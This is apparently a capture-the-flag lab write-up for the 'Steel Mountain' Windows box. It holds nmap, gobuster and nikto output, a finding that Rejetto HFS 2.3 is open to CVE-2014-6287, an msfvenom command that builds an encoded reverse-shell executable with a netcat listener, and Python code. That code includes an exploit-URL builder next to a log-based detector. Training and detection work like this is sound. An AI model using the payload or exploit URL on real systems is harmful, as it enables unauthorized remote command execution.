# Steel Mountain
nmap:
Scanning 10.10.54.15 [1000 ports]
Discovered open port 80/tcp on 10.10.54.15
Discovered open port 8080/tcp on 10.10.54.15
Discovered open port 135/tcp on 10.10.54.15
Discovered open port 3389/tcp on 10.10.54.15
Discovered open port 445/tcp on 10.10.54.15
Discovered open port 139/tcp on 10.10.54.15
Discovered open port 49153/tcp on 10.10.54.15
Discovered open port 49152/tcp on 10.10.54.15
Discovered open port 49155/tcp on 10.10.54.15
Discovered open port 49154/tcp on 10.10.54.15
Discovered open port 49157/tcp on 10.10.54.15
Completed SYN Stealth Scan at 11:45, 35.22s elapsed (1000 total ports)
Initiating Service scan at 11:45
Scanning 11 services on 10.10.54.15
Service scan Timing: About 63.64% done; ETC: 11:46 (0:00:35 remaining)
Completed Service scan at 11:46, 63.03s elapsed (11 services on 1 host)
Initiating OS detection (try #1) against 10.10.54.15
Retrying OS detection (try #2) against 10.10.54.15
adjust_timeouts2: packet supposedly had rtt of -379516 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -379516 microseconds. Ignoring time.
Retrying OS detection (try #3) against 10.10.54.15
Initiating Traceroute at 11:46
Completed Traceroute at 11:46, 0.23s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 11:46
Completed Parallel DNS resolution of 2 hosts. at 11:46, 0.08s elapsed
NSE: Script scanning 10.10.54.15.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:46
Completed NSE at 11:46, 10.51s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:46
NSE Timing: About 98.86% done; ETC: 11:47 (0:00:00 remaining)
Completed NSE at 11:47, 60.02s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:47
Completed NSE at 11:47, 0.00s elapsed
Nmap scan report for 10.10.54.15
Host is up, received reset ttl 127 (0.22s latency).
Scanned at 2020-10-17 11:44:36 EDT for 181s
Not shown: 989 closed ports
Reason: 989 resets
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 8.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server? syn-ack ttl 127
|_ssl-date: 2020-10-17T15:46:38+00:00; 0s from scanner time.
8080/tcp open http syn-ack ttl 127 HttpFileServer httpd 2.3
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
OS fingerprint not ideal because: maxTimingRatio (1.512000e+00) is greater than 1.4
Aggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (96%), Microsoft Windows Server 2012 R2 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Server 2012 or Server 2012 R2 (95%), Microsoft Windows Server 2008 SP2 Datacenter Version (93%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (93%), Microsoft Windows Server 2008 R2 SP1 (93%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.80%E=4%D=10/17%OT=80%CT=1%CU=40069%PV=Y%DS=2%DC=T%G=N%TM=5F8B1219%P=x86_64-pc-linux-gnu)
SEQ(SP=102%GCD=1%ISR=109%CI=I%II=I%TS=7)
SEQ(SP=101%GCD=1%ISR=109%CI=RD%TS=7)
SEQ(SP=103%GCD=1%ISR=106%TI=RD%TS=A)
OPS(O1=M508NW8ST11%O2=M508NW8ST11%O3=M508NW8NNT11%O4=M508NW8ST11%O5=M508NW8ST11%O6=M508ST11)
WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)
ECN(R=Y%DF=Y%T=80%W=2000%O=M508NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)
T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)
T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=80%CD=Z)
Uptime guess: 0.001 days (since Sat Oct 17 11:45:41 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Randomized
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:39:fe:d3:9a:09 (unknown)
| Names:
| STEELMOUNTAIN<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| STEELMOUNTAIN<20> Flags: <unique><active>
| Statistics:
| 02 39 fe d3 9a 09 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 37222/tcp): CLEAN (Couldn't connect)
| Check 2 (port 41680/tcp): CLEAN (Couldn't connect)
| Check 3 (port 10376/udp): CLEAN (Timeout)
| Check 4 (port 47254/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-10-17T15:46:28
|_ start_date: 2020-10-17T15:40:08
TRACEROUTE (using port 143/tcp)
HOP RTT ADDRESS
1 220.33 ms 10.9.0.1
2 220.36 ms 10.10.54.15
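As an added example (not part of the original notes), a small Python parser for the nmap -sV --reason port table above. It attaches the NSE script output to the port it follows and applies three triage rules taken from this scan: the HFS 2.3 banner on 8080 (CVE-2014-6287, which affects HFS 2.3x before 2.3c), HTTP TRACE enabled on 80, and SMB signing disabled / not required on 445. The sample report is a trimmed copy of the scan output above; the finding text and the version regex are this example's own.

```python
import re
from typing import Dict, List

# Port-table line as printed by `nmap -sV --reason`. The REASON column reads
# "syn-ack ttl 127" and VERSION may be empty (3389/tcp above has none).
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s+"
    r"(?P<reason>\S+(?:\s+ttl\s+\d+)?)\s*(?P<version>.*)$"
)

# Trimmed copy of the port table and host-script block from the scan above.
NMAP_REPORT = """\
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 8.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server? syn-ack ttl 127
8080/tcp open http syn-ack ttl 127 HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Host script results:
| smb-security-mode:
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|_ Message signing enabled but not required
"""


def parse_nmap(report: str) -> Dict:
    """Return {'ports': {port: info}, 'host_scripts': [...]} from normal nmap output.

    NSE lines ('| ...' / '|_ ...') are attached to the port they follow, or to
    the host-script list once 'Host script results:' has been seen.
    """
    scan: Dict = {"ports": {}, "host_scripts": []}
    current: List[str] = []  # where '|' lines go; throwaway before the first port
    for raw in report.splitlines():
        line = raw.rstrip()
        if line.startswith("Host script results"):
            current = scan["host_scripts"]
            continue
        m = PORT_LINE.match(line)
        if m:
            info = {
                "proto": m["proto"],
                "state": m["state"],
                "service": m["service"],
                "version": m["version"].strip(),
                "scripts": [],
            }
            scan["ports"][int(m["port"])] = info
            current = info["scripts"]
            continue
        if line.startswith("|"):
            current.append(line.lstrip("|_ ").strip())
    return scan


def triage(scan: Dict) -> List[str]:
    """Apply banner/script rules and return human-readable findings."""
    findings: List[str] = []
    for port, info in sorted(scan["ports"].items()):
        version = info["version"]
        scripts = " ".join(info["scripts"])
        # Rejetto HFS 2.3, 2.3a and 2.3b are affected by CVE-2014-6287
        # (unauthenticated RCE via %00 in the search parameter); 2.3c fixed it.
        m = re.search(r"HttpFileServer httpd (2\.3[ab]?)$", version)
        if m:
            findings.append(
                f"{port}/{info['proto']}: Rejetto HFS {m.group(1)} -> CVE-2014-6287 (RCE)"
            )
        if "Potentially risky methods: TRACE" in scripts:
            findings.append(f"{port}/{info['proto']}: HTTP TRACE enabled (cross-site tracing)")
    host_scripts = " ".join(scan["host_scripts"])
    if "message_signing: disabled" in host_scripts:
        findings.append("445/tcp: SMB1 message signing disabled (NTLM relay possible)")
    if "Message signing enabled but not required" in host_scripts:
        findings.append("445/tcp: SMB2 signing not required (NTLM relay possible)")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_nmap(NMAP_REPORT)):
        print(finding)
```

Feed it `nmap -sV --reason -oN` output and the version regex is the only part that needs tending; the script attachment works for any port table because NSE lines always follow the port they belong to.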
gobuster:
nothing of note, only /img found
dirb:
nothing
nikto:
+ Server: Microsoft-IIS/8.5
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
manual search:
port 8080 is running Rejetto HTTP File Server (HFS) 2.3, which is vulnerable to CVE-2014-6287 (unauthenticated remote command execution via a %00 in the search parameter; fixed in 2.3c)
msfvenom payload (start a listener on 10.10.166.62:4443, e.g. nc -lvnp 4443, before the payload runs on the target):
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.166.62 LPORT=4443 -e x86/shikata_ga_nai -f exe -o ASCService.exe
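An added example (not from the original notes) showing both sides of the CVE-2014-6287 finding above: the single GET request that triggers the bug on HFS 2.3x before 2.3c (a %00 that truncates the search term so the rest of the parameter is parsed as an HFS macro, here {.exec|...}), and detection logic that flags that shape in web-server access logs. The command passed to {.exec|...} is a placeholder; how the msfvenom-generated ASCService.exe is staged onto the box is not described in these notes and is not assumed here. The sample log lines are constructed (combined log format, as a reverse proxy in front of HFS would write them), not real entries from the target.

```python
import re
from typing import Dict, List
from urllib.parse import quote, unquote

# HFS macro marker: {.name|args.}  (e.g. {.exec|cmd /c whoami.}, {.save|path|data.}).
# A leading '+' after '{.' is tolerated because some public exploit code emits it.
MACRO_RE = re.compile(r"\{\.\+?(\w+)\|", re.IGNORECASE)


def build_cve_2014_6287_url(host: str, port: int, command: str) -> str:
    """Return the GET URL that triggers CVE-2014-6287 on Rejetto HFS 2.3x < 2.3c.

    The %00 truncates the search term inside HFS's findMacroMarker, so the rest
    of the parameter is parsed as a macro and {.exec|...} runs the command.
    `command` is whatever the operator wants executed; it is only URL-encoded here.
    """
    return f"http://{host}:{port}/?search=%00{{.exec|{quote(command, safe='')}.}}"


def inspect_request(request_target: str) -> Dict:
    """Classify one request-target (path + query) the way it appears in a log."""
    decoded = unquote(request_target)          # %00 -> '\x00', %7B -> '{', ...
    null_byte = "\x00" in decoded
    macros = [m.group(1).lower() for m in MACRO_RE.finditer(decoded)]
    if null_byte and macros:
        verdict = "exploit"       # the CVE-2014-6287 shape: terminator + macro
    elif null_byte or macros:
        verdict = "suspicious"    # one half of the pattern; worth a look
    else:
        verdict = "clean"
    return {"null_byte": null_byte, "macros": macros, "verdict": verdict}


# Request-line extractor for combined-log-format lines ('"GET /path HTTP/1.1"').
LOG_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log; not real entries from the target.
SAMPLE_LOG = """\
10.9.0.1 - - [17/Oct/2020:11:50:01 -0400] "GET / HTTP/1.1" 200 1256
10.9.0.1 - - [17/Oct/2020:11:50:02 -0400] "GET /?search=report HTTP/1.1" 200 311
10.9.0.1 - - [17/Oct/2020:11:50:09 -0400] "GET /?search=%00{.exec|cmd%20%2Fc%20whoami.} HTTP/1.1" 200 0
10.9.0.1 - - [17/Oct/2020:11:50:10 -0400] "GET /?search=%00%7B.save%7CC%3A%5Ctmp%5Cx.vbs%7Cmsgbox.%7D HTTP/1.1" 200 0
"""


def scan_log(log_text: str) -> List[Dict]:
    """Return every non-clean request with its 1-based line number."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        m = LOG_LINE.search(line)
        if not m:
            continue
        result = inspect_request(m["target"])
        if result["verdict"] != "clean":
            hits.append({"line": n, "target": m["target"], **result})
    return hits


if __name__ == "__main__":
    print(build_cve_2014_6287_url("10.10.54.15", 8080, "cmd /c whoami"))
    for hit in scan_log(SAMPLE_LOG):
        print(hit["line"], hit["verdict"], hit["macros"], hit["target"])
```

The detector decodes before matching so that an attacker percent-encoding the braces (line 4 of the sample) is caught the same as one sending them raw (line 3); a legitimate search (line 2) contains neither the null byte nor a macro marker and stays clean.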